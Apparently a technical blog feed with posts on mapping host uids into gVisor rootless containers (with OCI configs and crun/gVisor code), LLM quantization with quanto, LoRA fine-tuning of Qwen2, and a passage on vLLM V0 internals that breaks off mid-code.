不忘初心方得始终

Map non-root user in host to non-root user in container with the same uid

2025-10-11T00:00:00+00:00

Introduction

Once when I use gVisor’s rootless mode, I found that non-root user can only be mapped to root in container. Some software’s behaviour is different between root user and non-root user. So I want to run gVisor mapped the non-root user to the same user in container.

Following is what I wanted. The uid=1000 user is the same both in user ns and the outside user ns.

My first attempt is to set the container’s user to 1000 user.

"process": {
    "user": {
        "uid": 1000,
        "gid": 1000
    },

However this doesn’t work. Then I tried following OCI config.json which has following configuration:

Config process.user to 1000
Config linux.uidMappings to map host 1000 to container 1000
Config linux.ns with user

{
  "ociVersion": "1.0.0",
  "process": {
    "user": {
      "uid": 1000,
      "gid": 1000
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "TERM=xterm"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE",
        "CAP_NET_RAW"
      ],
      "effective": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE",
        "CAP_NET_RAW"
      ],
      "inheritable": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE",
        "CAP_NET_RAW"
      ],
      "permitted": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE"
      ]
    },
    "rlimits": [
      {
        "type": "RLIMIT_NOFILE",
        "hard": 1024,
        "soft": 1024
      }
    ]
  },
  "root": {
    "path": "rootfs",
    "readonly": true
  },
  "hostname": "runsc",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc"
    },
    {
      "destination": "/dev",
      "type": "tmpfs",
      "source": "tmpfs"
    },
    {
      "destination": "/sys",
      "type": "sysfs",
      "source": "sysfs",
      "options": [
        "nosuid",
        "noexec",
        "nodev",
        "ro"
      ]
    },
    {
      "destination": "/tmp",
      "type": "bind",
      "source": "/tmp",
      "options": [
        "rbind",
        "rw"
      ]
    }
  ],
  "linux": {
    "uidMappings": [
      {
        "containerID": 1000,
        "hostID": 1000,
        "size": 1
      }
    ],
    "gidMappings": [
      {
        "containerID": 1000,
        "hostID": 1000,
        "size": 1
      }
    ],
    "namespaces": [
      {
        "type": "pid"
      },
      {
        "type": "network"
      },
      {
        "type": "ipc"
      },
      {
        "type": "uts"
      },
      {
        "type": "mount"
      },
      {
        "type": "user"
      }
    ]
  }
}

This configuration map the uid=1000 user in host to the uid=1000 user in container. Which I expected should work. However it doesn’t work.

The error occurs in unix.RawSyscall(unix.SYS_SETUID, 0, 0, 0).

func syncUsernsForRootless(fd int) {
	if err := waitForFD(fd, "userns sync FD"); err != nil {
		util.Fatalf("failed to sync on userns FD: %v", err)
	}

	// SETUID changes UID on the current system thread, so we have
	// to re-execute current binary.
	runtime.LockOSThread()
	if _, _, errno := unix.RawSyscall(unix.SYS_SETUID, 0, 0, 0); errno != 0 {
		util.Fatalf("failed to set UID: %v", errno)
	}
	if _, _, errno := unix.RawSyscall(unix.SYS_SETGID, 0, 0, 0); errno != 0 {
		util.Fatalf("failed to set GID: %v", errno)
	}
}

This is reasonable as we are 1000 user in the current user ns so we can’t call setuid to 0. So how can we achieve our goal? Before our analysis, Let’s just see how podman and crun does.

The podman userns=keep-id implementation

The ‘podman run’ command has a ‘–userns’ option which can be set as ‘–userns=keep-id’. This will achive what I want, to run the container process with the uid as the user outside the container.

Following pic show it:

podman starts a conmon(seems it uses systemd to start). Then conmon starts the container first process.

Let’s see the OCI spec.

test@test-virtual-machine:~$ podman inspect 8de77c63d183 --format json | grep OCI
        "OCIConfigPath": "/home/test/xxxuserdata/config.json",

  "linux": {
    "uidMappings": [
      {
        "containerID": 0,
        "hostID": 1,
        "size": 1000
      },
      {
        "containerID": 1000,
        "hostID": 0,
        "size": 1
      },
      {
        "containerID": 1001,
        "hostID": 1001,
        "size": 64536
      }
    ],
    "gidMappings": [
      {
        "containerID": 0,
        "hostID": 1,
        "size": 1000
      },
      {
        "containerID": 1000,
        "hostID": 0,
        "size": 1
      },
      {
        "containerID": 1001,
        "hostID": 1001,
        "size": 64536
      }
    ],

As we can see, it sets the host uid=0 to container uid=1000. But where is our host uid=1000. What I need is to map host uid=1000 to container uid=1000.

After dig into the code and explore the uid_map of conmon and container process I found the truth.

In the container the uid_map is as follows, just the same as OCI spec.

The conmon’s uid_map.

The container’s uid_map

Now we have the conclude, the podman rootless container create two user ns. One for conmon which map the host uid=1000 to container uid=0, and then the conmon start the container process which map uid=0 to container uid=1000. Through this method, the container uid=1000 is the same user in host uid=1000.

Notice the container’s uid_map is not the same from host view and from container view. This is because the uid_map’s read handler will adjust according the reader’s user ns.

Following pic shows the process.

The crun method

So can crun works well with following OCI spec(the same with my second attempt).

{
  "ociVersion": "1.0.2-dev",
  "process": {
    "terminal": true,
    "user": {
      "uid": 1000,
      "gid": 1000
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "TERM=xterm"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE"
      ],
      "effective": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE"
      ],
      "permitted": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE"
      ],
      "ambient": [
        "CAP_AUDIT_WRITE",
        "CAP_KILL",
        "CAP_NET_BIND_SERVICE"
      ]
    },
    "rlimits": [
      {
        "type": "RLIMIT_NOFILE",
        "hard": 1024,
        "soft": 1024
      }
    ],
    "noNewPrivileges": true
  },
  "root": {
    "path": "rootfs",
    "readonly": true
  },
  "hostname": "runc",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc"
    },
    {
      "destination": "/dev",
      "type": "tmpfs",
      "source": "tmpfs",
      "options": [
        "nosuid",
        "strictatime",
        "mode=755",
        "size=65536k"
      ]
    },
    {
      "destination": "/dev/pts",
      "type": "devpts",
      "source": "devpts",
      "options": [
        "nosuid",
        "noexec",
        "newinstance",
        "ptmxmode=0666",
        "mode=0620"
      ]
    },
    {
      "destination": "/dev/shm",
      "type": "tmpfs",
      "source": "shm",
      "options": [
        "nosuid",
        "noexec",
        "nodev",
        "mode=1777",
        "size=65536k"
      ]
    },
    {
      "destination": "/dev/mqueue",
      "type": "mqueue",
      "source": "mqueue",
      "options": [
        "nosuid",
        "noexec",
        "nodev"
      ]
    },
    {
      "destination": "/sys",
      "type": "none",
      "source": "/sys",
      "options": [
        "rbind",
        "nosuid",
        "noexec",
        "nodev",
        "ro"
      ]
    },
    {
      "destination": "/sys/fs/cgroup",
      "type": "cgroup",
      "source": "cgroup",
      "options": [
        "nosuid",
        "noexec",
        "nodev",
        "relatime",
        "ro"
      ]
    },
    {
      "destination": "/tmp",
      "type": "bind",
      "source": "/home/test/cruntest/mycontainer/rootfs/tmp",
      "options": [
        "rw",
        "rbind"
      ]
    }
  ],
  "linux": {
    "uidMappings": [
      {
        "containerID": 1000,
        "hostID": 1000,
        "size": 1
      }
    ],
    "gidMappings": [
      {
        "containerID": 1000,
        "hostID": 1000,
        "size": 1
      }
    ],
    "namespaces": [
      {
        "type": "pid"
      },
      {
        "type": "ipc"
      },
      {
        "type": "uts"
      },
      {
        "type": "mount"
      },
      {
        "type": "cgroup"
      },
      {
        "type": "user"
      }
    ],
    "maskedPaths": [
      "/proc/acpi",
      "/proc/asound",
      "/proc/kcore",
      "/proc/keys",
      "/proc/latency_stats",
      "/proc/timer_list",
      "/proc/timer_stats",
      "/proc/sched_debug",
      "/sys/firmware",
      "/proc/scsi"
    ],
    "readonlyPaths": [
      "/proc/bus",
      "/proc/fs",
      "/proc/irq",
      "/proc/sys",
      "/proc/sysrq-trigger"
    ]
  }
}

Yes it works.

Let’s see the uid_map

The same as our expected.

crun also has a ‘setresuid’ process, however the uid’s switch to not always 0(which gVisor does). If the root(uid=0) user is mapped into the container user ns, it will uses 0. If not, the ‘def->process->user->uid’ will be used.

/* Detect if root is available in the container.  */
static bool
root_mapped_in_container_p (runtime_spec_schema_defs_id_mapping **mappings, size_t len)
{
  size_t i;

  for (i = 0; i < len; i++)
    if (mappings[i]->container_id == 0)
      return true;

  return false;
}

static int
set_id_init (libcrun_container_t *container, libcrun_error_t *err)
{
  runtime_spec_schema_config_schema *def = container->container_def;
  uid_t uid = 0;
  gid_t gid = 0;
  int ret;

  if (def->process && def->process->user && def->linux)
    {
      /*
        If it is running in a user namespace and root is not mapped
        use the UID/GID specified for running the container.
      */
      bool root_mapped = false;

      if (def->linux->uid_mappings_len != 0)
        {
          root_mapped = root_mapped_in_container_p (def->linux->uid_mappings, def->linux->uid_mappings_len);
          if (! root_mapped)
            uid = def->process->user->uid;

          libcrun_debug ("Using mapped UID in container: `%d`", uid);
        }

      if (def->linux->gid_mappings_len != 0)
        {
          root_mapped = root_mapped_in_container_p (def->linux->gid_mappings, def->linux->gid_mappings_len);
          if (! root_mapped)
            gid = def->process->user->gid;

          libcrun_debug ("Using mapped GID in container: `%d`", gid);
        }
    }

  ret = setresuid (uid, uid, uid);
  if (UNLIKELY (ret < 0))
    return crun_make_error (err, errno, "setresuid to `%d`", uid);

  ret = setresgid (gid, gid, gid);
  if (UNLIKELY (ret < 0))
    return crun_make_error (err, errno, "setresgid to `%d`", gid);

  return 0;
}

The gVisor method

The gVisor patch also follows the crun’s method(which is suggested by avagin). If the root user is not maped to container user ns, we uses the ‘Process.User.UID’.

func rootMappedInContainer(IDMap []specs.LinuxIDMapping) bool {
	for _, idMap := range IDMap {
		if idMap.ContainerID == 0 {
			return true
		}
	}
	return false
}

func SandboxUserGroupIDs(spec *specs.Spec) (uint32, uint32) {
	uid := uint32(0)
	gid := uint32(0)

	if !rootMappedInContainer(spec.Linux.UIDMappings) {
		uid = spec.Process.User.UID
	}

	if !rootMappedInContainer(spec.Linux.GIDMappings) {
		gid = spec.Process.User.GID
	}

	return uid, gid
}

After this, we can run gVisor in rootlessmode with non-root host user mapped to non-root container use with the same uid.

After the new patch, following works well.

Summary

The most important is that ‘The child process in a new user namespace will have the full capability even it has a non-0 uid’. So that it can do setuid(0,0).

大模型量化简介

2025-07-26T00:00:00+00:00

本文记录下学习大模型量化过程中的过程，本文不涉及高深的各种量化策略以及量化效果对比，只是记录对量化过程的探索。量化的含义本质上很简单，即将模型的存储数据从浮点数转换为整数，从而降低显存使用，那这个过程中必然有数值的转换、模型保存、加载。但是在研究量化的过程中所用时间超过了之前的LoRA，因为实际过程中有很多坑，光看网上文章是不会理解的，具体来说，起码有下面几个：

transformers自身支持的量化方案，也就是 load_in_8bit 参数需要依赖 bitsandbytes，这个库在Windows上支持很不友好，也依赖GPU。
直接使用quanto库进行量化有问题，需要optimum-quanto
量化效果不显著，是因为量化通常来说只量化Linear以及Norm层，很多层都不量化，比如用GPT2测试，就会有很多层不会量化
使用quanto的quantize进行量化之后，还需要freeze才会将weight改成INT8类型

下面开始对量化的探索。

量化简介

大模型量化指的是将模型参数从高精度（比如FP32, 4字节）转换为低精度（比如INT8, 1字节）的方法。下面这个图（来自：Huggingface 的量化基础）展示了量化的核心思想：

可以看到，量化之后使用的内存减少到了四分之一。

量化的核心就是怎么做这个映射，使得低精度的模型尽可能的准确。这里只介绍最简单的对称量化absmax。下面的图(来自：大模型量化总结 )展示了其基本思想，本质上就是将输入的最大值的绝对值映射到127上，从而将整个数据映射到-127到127之间，并且原始的高精度的0映射到低精度的0.

在反量化之后可以看到，精度有所丢失。

手动量化

参考大语言模型量化原理和GPT-2量化实战中的示例，这里手动进行abxmax量化实验。

def absmax_quantize(X):
    # 计算比例因子
    scale = 127 / torch.max(torch.abs(X))
    # 量化
    X_quant = (scale * X).round()
    # 反量化
    X_dequant = X_quant / scale
    return X_quant.to(torch.int8), X_dequant

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
torch.manual_seed(0)

# 设置设备为cpu
device = 'cpu'
# 加载模型和分词器
model_id = 'gpt2'
model = AutoModelForCausalLM.from_pretrained(model_id).to(device)
tokenizer = AutoTokenizer.from_pretrained(model_id)

# 打印模型大小
print(f"模型的大小: {model.get_memory_footprint():,} bytes")


# 提取第一个注意力层的权重
weights = model.transformer.h[0].attn.c_attn.weight.data
print("原始权重:")
print(weights)

# 用 absmax 方法量化
weights_abs_quant, _ = absmax_quantize(weights)
print("\nAbsmax量化权重:")
print(weights_abs_quant)

下面的输出可以看到，模型已经从高精度转换为低精度了。

下面直接使用GPT2进行量化：

import numpy as np
from copy import deepcopy

# 保存原始权重
weights = [param.data.clone() for param in model.parameters()]

# 创建量化模型副本
model_abs = deepcopy(model)

# 量化所有模型权重
weights_abs = []
for param in model_abs.parameters():
    _, dequantized = absmax_quantize(param.data)
    param.data = dequantized
    weights_abs.append(dequantized)

weights = model.transformer.h[0].attn.c_attn.weight.data
print("原始权重:")
print(weights)

weights1 = model_abs.transformer.h[0].attn.c_attn.weight.data
print("量化之后的权重:")
print(weights1)

注意absmax_quantize返回值的第二部分是量化之后反量化到对应精度的值，跟原始的高精度值会有一些区别，可以看到使用量化之后的INT8类型再反量化得到的精度跟原始精度有一些差异。

使用quanto库量化

下面研究使用quanto库进行量化


pip install optimum-quanto

量化并保存量化之后的模型，这里用Qwen2-0.5B-Instruct测试。

from transformers import AutoModelForCausalLM
from optimum.quanto import QuantizedModelForCausalLM, qint8

model = AutoModelForCausalLM.from_pretrained('Qwen/Qwen2-0.5B-Instruct')
qmodel = QuantizedModelForCausalLM.quantize(model, weights=qint8, exclude='lm_head')
qmodel.save_pretrained('./Qwen2-0.5B-Instruct-quantized')

加载量化模型，并且对比输出。

from optimum.quanto import QuantizedModelForCausalLM
from transformers import AutoTokenizer, AutoModelForCausalLM

tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")

model = AutoModelForCausalLM.from_pretrained('Qwen/Qwen2-0.5B-Instruct')
qmodel = QuantizedModelForCausalLM.from_pretrained('./Qwen2-0.5B-Instruct-quantized')

input_text = "Hello, who are you? "
input_ids = tokenizer(input_text, return_tensors="pt").input_ids

outputs = qmodel.generate(input_ids)
print(tokenizer.decode(outputs[0]))


outputs2 = model.generate(input_ids)
print(tokenizer.decode(outputs2[0]))

这里我们先看看量化之后在模型文件中是怎么提现的，然后分析量化模型的加载过程。从大小来看，数量确实小了，但也没有小多少，因为量化之后的文件还要存放额外的数据。

注意，量化之后的目录里面还有个quanto_qmap.json，这个文件保存了各个weight的配置，比如使用的量化方案。

打开量化前后的model.saftensors文件，可以看到，量化前是BF16，量化后变为了I8

可以看到权重的dtype变了，并且所在的位置也不一样，一个直接是xxx.weight，一个是xxx.weight._data。那为啥模型的大小没有小多少呢，可以看到量化之后的模型文件有很多的input_scale和output_scale，这个是用来在加载量化模型时候需要的。当然这个只是quanto这个库的行为，其他的量化方案可能采用不同的存储方案。

接下来调试量化模型的加载过程。首先通盘看一下量化前后的模型：

这里只量化了Linear层，变成了QLinear。接下来看看weight。

可以看到量化之后的weight是INT8的整数。我们先直观看看量化前后在计算自注意力的时候的值，以layer 0的q计算为例。先看量化之后的：

可以看到有差距，但是差距很小。但是从前面的模型可以看到，量化之后的weight是INT8类型的，那为啥这里的计算是反量化之后的呢？答案隐藏在QLinear的forward中。此时的input是输入的token（prefill阶段）经过embedding之后的矩阵，self.qweight是量化之后的weight。

这里单步进去会进入到quanto的相关函数，最终在qbytes_mm函数中完成反量化的计算。

综上，我们完成分析了从量化到使用量化模型进行推理的全过程，整个过程如下：

模型在量化时，使用量化策略将高精度的模型参数转换为低精度的参数，保存到磁盘的模型会变小
量化模型在加载时是直接加载INT8到显存/内存，会减少显存的使用
量化模型在推理过程中会有一个反量化的过程，也就是将INT转换为浮点数的过程

Ref

大模型量化总结

Huggingface 的量化基础

大语言模型量化原理和GPT-2量化实战

LoRA微调简介

2025-07-05T00:00:00+00:00

大模型微调简介

微调，指在一个已经预训练好的大模型基础上，使用一个特定任务或领域的较小规模数据集，对该模型进行进一步的训练，让通用的“通才”模型，快速、高效地转变成一个特定任务的“专才”模型，而不需要从头开始训练。

比如原始的GPT模型，其实只是一个预测下一个token概率的模型，要让其成为聊天机器人，还要用数据对齐进行微调。

微调的基本概念如下。

下面是deepseek生成的伪代码，其核心过程如下：

初始化，加载已经经过预训练的大模型，比如各个大公司的模型
准备数据集，准备用来微调的数据，比如对于聊天的大模型，就是各个聊天数据
配置参数，比如更新参数的方式以及损失函数的计算
训练，这里的训练把数据集中的样本作为输入，走一遍模型的推理，然后把模型的结果与样本的标签计算损失函数，做返现传播从而更新模型的参数
最终把模型参数保存起来，完成了一次微调

# ========== 初始化阶段 ==========
# 加载预训练的大模型
pretrained_model = load_model("LLaMA-3")  # 例如: GPT, BERT, LLaMA等
pretrained_model.freeze_weights()        # 对于参数高效微调(PEFT)，冻结基础权重

# 准备微调数据集
finetune_dataset = load_dataset(
    path="domain_specific_data.csv",     # 特定领域/任务的数据
    format="input-target"                # 输入-目标输出对
)

# 配置训练参数
optimizer = AdamW(
    params=pretrained_model.trainable_params,  # 仅更新可训练参数
    lr=2e-5,                           # 较小的学习率
    weight_decay=0.01
)
loss_function = CrossEntropyLoss()
scheduler = CosineAnnealingLR(optimizer, T_max=100)

# ========== 微调训练循环 ==========
for epoch in range(num_epochs):
    for batch in finetune_dataloader:
        # 前向传播
        inputs, targets = batch
        outputs = pretrained_model(inputs)
        
        # 计算损失
        loss = loss_function(outputs, targets)
        
        # 反向传播
        loss.backward()
        
        # 梯度裁剪 (防止梯度爆炸)
        torch.nn.utils.clip_grad_norm_(pretrained_model.parameters(), 1.0)
        
        # 参数更新
        optimizer.step()
        scheduler.step()
        optimizer.zero_grad()
        
        # 日志记录
        log_metrics(loss, accuracy)

# ========== 产出阶段 ==========
# 保存微调后的模型
finetuned_model = pretrained_model
save_model(finetuned_model, "legal_assistant_model.pth")

# 部署应用
deployment = ModelDeployment(finetuned_model)
deployment.serve(endpoint="/api/legal-assistant")

上面基本是全量微调的方案，全量微调当然能够提高模型在特定领域的表达力，但是它的缺点也很明显，训练成本高、时间长、需要大量的存储空间（想想动辄几十、上百亿的参数都要保存到GPU显存中)。

所以有了各种微调的优化，这里介绍LoRA微调。

LoRA 微调简介

LoRA(LORA: LOW-RANK ADAPTATION OF LARGE LANGUAGE MODELS)中文叫做低秩适配。LoRA的核心思想在下右图：

LoRA核心思路如下：

在预训练模型(PLM, Pre-trained Language Model)的参数旁边增加一个旁路，做一个先降维、再升维的操作
训练的时候固定PLM的参数，只训练降维和升维矩阵A和B，在输出时，将输入与PLM和AB矩阵的乘积相加
A的初始化用随机高斯分布，B的初始化用0矩阵。

上图左侧是全量微调的例子，其中参数 $W_{0} \in R^{d\times d}$ 是大模型的预训练权重，$\bigtriangleup W$ 是微调的权重，这样拆分是因为在微调过程中 $W_{0}$ 被固定了，只改变 $\bigtriangleup W$，可以看到在全量微调中，$\bigtriangleup W$ 的大小是等于 $\bigtriangleup W$，通常都是非常大的，$d\times d$ 。

右侧则是LoRA中微调，其微调过程变成了，现将输入通过矩阵A降维，$A\in R^{d\times r}$，r在这里成为秩，是一个比较小的值，然后再通过一个矩阵B升维，$B\in R^{r\times d}$，可以看到输入x经过AB之后，输出 $ \bigtriangleup W $依然是$ d\times d $,此时将$ \bigtriangleup W $和$ W_{0} $$ 相加依然对该层进行了微调。

这里的核心是r远小于d，假设d是100，则全量微调需要更新 $d\times d$ 共10000个参数，但是如果r设置为8，则只需要更新 $2\times r\times d$ 共1600个参数。

至于这个为啥能work，又是基于前人的intrinsic dimension研究，大概的意思就是参数的特征位于一个低维的子空间中。

论文也没看，直接来实践体会一下。

LoRA微调实践

这里我们微调Qwen2-0.5B-Instruct模型。没有微调之前，问Qwen模型“你是谁？”，可以看到其输出是很正常的。

from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset
from peft import LoraConfig,TaskType,get_peft_model
from peft import PeftModel

tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")
model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)



ipt = tokenizer("Human: {}\n{}".format("你是谁？", "").strip() + "\n\nAssistant: ", return_tensors="pt").to(model.device)
re = tokenizer.decode(model.generate(**ipt,max_length=256,do_sample=False)[0],skip_special_tokens=True)
print(re)

准备数据，在这个例子中，我们使用下面的数据

id.json

这个数据是从这里修改而来，这个训练数据是让大模型的名字和开发商变成我们定义的。id里面内容如下：

  {
    "instruction": "hi",
    "input": "",
    "output": "Hello! I am 小李, an AI assistant developed by 小张. How can I assist you today?"
  },
  {
    "instruction": "hello",
    "input": "",
    "output": "Hello! I am 小李, an AI assistant developed by 小张. How can I assist you today?"
  },
  {
    "instruction": "Who are you?",
    "input": "",
    "output": "I am 小李, an AI assistant developed by 小张. How can I assist you today?"
  },

接下来进行LoRA微调，这里用了peft包：

from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset,DatasetDict
from peft import LoraConfig,TaskType,get_peft_model
import torch


dataset = load_dataset('json',data_files='id.json',split='train')
dataset = dataset.train_test_split(test_size=0.1)



tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")

def process_fuc(one):
    MAX_LENGTH = 256
    input_ids,attention_mask,labels = [],[],[]
    instruction = tokenizer("\n".join(["Human: "+ one["instruction"],one["input"]]).strip() + "\n\nAssistant: ")
    response = tokenizer(one["output"] + tokenizer.eos_token)
    input_ids = instruction["input_ids"] + response["input_ids"]
    attention_mask = instruction["attention_mask"] + response["attention_mask"]
    labels = [-100] * len(instruction["input_ids"]) + response["input_ids"]
    if len(input_ids) > MAX_LENGTH:
        input_ids = input_ids[:MAX_LENGTH]
        attention_mask = attention_mask[:MAX_LENGTH]
        labels = labels[:MAX_LENGTH]
    return {
        "input_ids": input_ids,
        "attention_mask": attention_mask,
        "labels": labels
    }
tokenizer_dataset = dataset.map(process_fuc,remove_columns=dataset['train'].column_names)

model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)

loraconfig = LoraConfig(task_type=TaskType.CAUSAL_LM,target_modules=["q_proj", "k_proj", "v_proj",])
#loraconfig = LoraConfig(task_type=TaskType.CAUSAL_LM,target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],)
model = get_peft_model(model,loraconfig)

args = TrainingArguments(
    output_dir="./chatbot2",
    per_device_train_batch_size=1,
    logging_steps=10,
    num_train_epochs=10
)

trainer = Trainer(
    model=model,
    args=args,
    train_dataset=tokenizer_dataset['train'],
    data_collator=DataCollatorForSeq2Seq(tokenizer=tokenizer,padding=True),
)

trainer.train()

这里训练的epoch设置为10，如果设置过小似乎改变不了大模型。这里如果在Colab用GPU会很快一分钟不到，用CPU会慢一点，大概11分钟。

Colab时候，这里checkpoint是810,不知道为啥这里不一样。

微调之后输出，问问大模型，可以看到，其输出为我们修改的数据。

from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset
from peft import LoraConfig,TaskType,get_peft_model
from peft import PeftModel

tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")
model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)


#model = model.cuda()
lora_model = PeftModel.from_pretrained(model, model_id="./chatbot2/checkpoint-500/")

ipt = tokenizer("Human: {}\n{}".format("你是谁?", "").strip() + "\n\nAssistant: ", return_tensors="pt").to(model.device)
re = tokenizer.decode(lora_model.generate(**ipt,max_length=256,do_sample=False)[0],skip_special_tokens=True)
print(re)

LoRA调试

这里我们简单看看微调之后的模型运行情况。可以看到，经过LoRA微调之后，在进行自注意力的时候会有两个矩阵A, B，这里的r为8。

其核心是在这里，当走到Qen2里面计算自注意力的时候，计算q、k、v的时的Linear是Lora模块的Linear

下面的lora_A和lora_B与x的相乘就是在使用LoRA微调的AB矩阵。

vLLM中的LoRA

可以看到LoRA的数据都是保存在那个checkpoint文件中的。

所以只要把原始Model(Qwen2-0.5B-Instruct）与微调的合在一起并且输入到推理框架，就能实现微调效果。在vLLM框架中，如果指定了LoRA配置，在Runner Load model时候会调用craete_lora_manager用Lora的model替换Runner中的model。

Ref

用了这里的微调数据模板: 大模型微调实战：通过 LoRA 微调修改模型自我认知

用了这里的代码：使用huggingface的PEFT库在千问2基础上进行Lora指令微调

参考了：LORA：大模型轻量级微调

参考了：图解大模型微调系列之：大模型低秩适配器LoRA（原理篇）

vLLM源码(V0)结构分析

2025-06-08T00:00:00+00:00

vLLM使用通常如下（本地推理，非服务）：

from vllm import LLM

llm = LLM(model="facebook/opt-125m")
outputs = llm.generate("Hello, my name is")

for output in outputs:
    prompt = output.prompt
    generated_text = output.outputs[0].text
    print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")

vLLM代码结构有非常清晰的类层次结构，整体的数据结构关系如下：

这里我们以V0分析，重在分析其各个类之间的关系，主要讨论核心的两个问题即LLM()创建模型引擎，以及通过llm.generate进行推理。本质就是加载模型和处理请求，本文只讨论整体结构，以CPU运行为例。

模型的加载

下面这个图展示了模型的加载流程，通过Executor、Worker层，最终由ModelRunner层开始加载模型。

最终调用vllm/model/executor/model_loader/init.py文件中的get_model完成实际模型加载工作。

def get_model(*, vllm_config: VllmConfig) -> nn.Module:
    loader = get_model_loader(vllm_config.load_config)
    return loader.load_model(vllm_config=vllm_config)

这里loader默认情况下是DefaultModelLoader。其load_model函数如下：

    def load_model(self, vllm_config: VllmConfig) -> nn.Module:
        device_config = vllm_config.device_config
        model_config = vllm_config.model_config
        target_device = torch.device(device_config.device)
        with set_default_torch_dtype(model_config.dtype):
            with target_device:
                model = _initialize_model(vllm_config=vllm_config)

            weights_to_load = {name for name, _ in model.named_parameters()}
            loaded_weights = model.load_weights(
                self.get_all_weights(model_config, model))
            self.counter_after_loading_weights = time.perf_counter()
            logger.info(
                "Loading weights took %.2f seconds",
                self.counter_after_loading_weights -
                self.counter_before_loading_weights)
            # We only enable strict check for non-quantized models
            # that have loaded weights tracking currently.
            if model_config.quantization is None and loaded_weights is not None:
                weights_not_loaded = weights_to_load - loaded_weights
                if weights_not_loaded:
                    raise ValueError(
                        "Following weights were not initialized from "
                        f"checkpoint: {weights_not_loaded}")

            _process_weights_after_loading(model, model_config, target_device)

        return model.eval()

_initialize_model得到模型结构的class，并且调用模型的初始化函数，比如Qwen2ForCausalLM.init()函数。

def _initialize_model(
    vllm_config: VllmConfig,
    *,
    prefix: str = "",
    model_class: Optional[type[nn.Module]] = None,
) -> nn.Module:
    """Initialize a model with the given configurations."""
    model_config = vllm_config.model_config
    if model_class is None:
        model_class, _ = get_model_architecture(model_config)

    if vllm_config.quant_config is not None:
        configure_quant_config(vllm_config.quant_config, model_class)

    signatures = inspect.signature(model_class.__init__)
    all_params = [param.name for param in signatures.parameters.values()]
    if "vllm_config" in all_params and "prefix" in all_params:
        # new-style model class
        with set_current_vllm_config(vllm_config, check_compile=True):
            return model_class(vllm_config=vllm_config, prefix=prefix)

    ...

model.load_weights则开始调用模型的函数加载权重。最终会调用到AutoWeightsLoader的load_wegiths函数。

    def load_weights(self, weights: Iterable[Tuple[str,
                                                   torch.Tensor]]) -> Set[str]:
        loader = AutoWeightsLoader(
            self,
            skip_prefixes=(["lm_head."]
                           if self.config.tie_word_embeddings else None),
        )
        return loader.load_weights(weights)

这里的wegiths是从 self.get_all_weights(model_config, model)) 这个函数获取的，get_all_wegiths从safetensors中加载权重。相关调用如下：

DefaultModelLoader.get_all_weights
  -->self._get_weights_iterator
    -->self._prepare_weights
    -->safetensors_weights_iterator

safetensors_weights_iterator中打开文件。

def safetensors_weights_iterator(
    hf_weights_files: List[str],
    use_tqdm_on_load: bool,
) -> Generator[Tuple[str, torch.Tensor], None, None]:
    """Iterate over the weights in the model safetensor files."""
    for st_file in tqdm(
            hf_weights_files,
            desc="Loading safetensors checkpoint shards",
            disable=not enable_tqdm(use_tqdm_on_load),
            bar_format=_BAR_FORMAT,
    ):
        with safe_open(st_file, framework="pt") as f:
            for name in f.keys():  # noqa: SIM118
                param = f.get_tensor(name)
                yield name, param

请求的处理

请求处理的过程如下：

核心过程是在LLMEngine中的step函数。step函数注释很清晰，第一步将要处理的下一步的seq group找出来，第二步调用executor执行推理，第三步处理输出。

    def step(self) -> List[Union[RequestOutput, PoolingRequestOutput]]:
        """Performs one decoding iteration and returns newly generated results.

        .. figure:: https://i.imgur.com/sv2HssD.png
            :alt: Overview of the step function
            :align: center

            Overview of the step function.

        Details:
            - Step 1: Schedules the sequences to be executed in the next
              iteration and the token blocks to be swapped in/out/copy.

                - Depending on the scheduling policy,
                  sequences may be `preempted/reordered`.
                - A Sequence Group (SG) refer to a group of sequences
                  that are generated from the same prompt.

            - Step 2: Calls the distributed executor to execute the model.
            - Step 3: Processes the model output. This mainly includes:

                - Decodes the relevant outputs.
                - Updates the scheduled sequence groups with model outputs
                  based on its `sampling parameters` (`use_beam_search` or not).
                - Frees the finished sequence groups.

            - Finally, it creates and returns the newly generated results.

        ...
        """
        ...
        # For llm_engine, there is no pipeline parallel support, so the engine
        # used is always 0.
        virtual_engine = 0

        ...
        if not self._has_remaining_steps(
                seq_group_metadata_list
        ) and not self._skip_scheduling_next_step:
